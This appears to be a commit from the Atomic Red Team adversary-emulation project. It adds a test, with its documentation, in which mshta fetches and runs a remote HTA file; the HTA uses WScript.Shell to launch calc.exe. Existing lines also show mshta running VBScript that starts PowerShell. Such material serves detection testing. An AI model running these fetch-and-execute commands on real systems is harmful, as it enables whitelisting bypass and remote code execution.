T1170 remote hta (#633)

* T1170 Remote HTA test * Generate docs from job=validate_atomics_generate_docs branch=t1170-remote-hta
2019-11-11 08:45:07 -06:00
parent 5332936f8f
commit 26e0f443b9
6 changed files with 90 additions and 3 deletions
@@ -0,0 +1,12 @@
+<html>
+<head>
+<HTA:APPLICATION ID="AtomicRedTeam">
+<script language="jscript">
+        var c = "cmd.exe /c calc.exe"; 
+        new ActiveXObject('WScript.Shell').Run(c);
+</script>
+</head>
+<body>
+<script>self.close();</script>
+</body>
+</html>
@@ -18,6 +18,8 @@ Mshta.exe can be used to bypass application whitelisting solutions that do not a

 - [Atomic Test #3 - Mshta executes VBScript to execute malicious command](#atomic-test-3---mshta-executes-vbscript-to-execute-malicious-command)

+- [Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)](#atomic-test-4---mshta-executes-remote-html-application-hta)
+

 <br/>

@@ -82,4 +84,25 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit



+<br/>
+<br/>
+
+## Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)
+Execute an arbitrary remote HTA.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| hta_url | URL to HTA file for execution | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta|
+
+#### Run it with `command_prompt`! 
+```
+mshta #{hta_url}
+```
+
+
+
 <br/>
@@ -51,4 +51,20 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+      mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+- name: Mshta Executes Remote HTML Application (HTA)
+  description: |
+    Execute an arbitrary remote HTA.
+
+  supported_platforms:
+    - windows
+  input_arguments:
+    hta_url:
+      description: URL to HTA file for execution
+      type: string
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+  executor:
+    name: command_prompt
+    command: |
+      mshta #{hta_url}
@@ -300,6 +300,7 @@
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
  - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
  - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+  - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
  - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -682,6 +683,7 @@
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
  - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
  - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+  - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
  - Atomic Test #1: Mimikatz [windows]
  - Atomic Test #2: BloodHound [windows]
@@ -8913,7 +8913,23 @@ defense-evasion:
      executor:
        name: command_prompt
        command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
-          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")'
+          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+'
+    - name: Mshta Executes Remote HTML Application (HTA)
+      description: 'Execute an arbitrary remote HTA.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        hta_url:
+          description: URL to HTA file for execution
+          type: string
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+      executor:
+        name: command_prompt
+        command: 'mshta #{hta_url}'
  T1096:
    technique:
      x_mitre_data_sources:
@@ -19406,7 +19422,23 @@ execution:
      executor:
        name: command_prompt
        command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
-          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")'
+          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+'
+    - name: Mshta Executes Remote HTML Application (HTA)
+      description: 'Execute an arbitrary remote HTA.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        hta_url:
+          description: URL to HTA file for execution
+          type: string
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+      executor:
+        name: command_prompt
+        command: 'mshta #{hta_url}'
  T1086:
    technique:
      x_mitre_permissions_required:
@@ -100,6 +100,7 @@
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
  - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
  - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+  - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
  - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -544,6 +545,7 @@
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
  - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
  - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+  - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
  - Atomic Test #1: Mimikatz [windows]
  - Atomic Test #2: BloodHound [windows]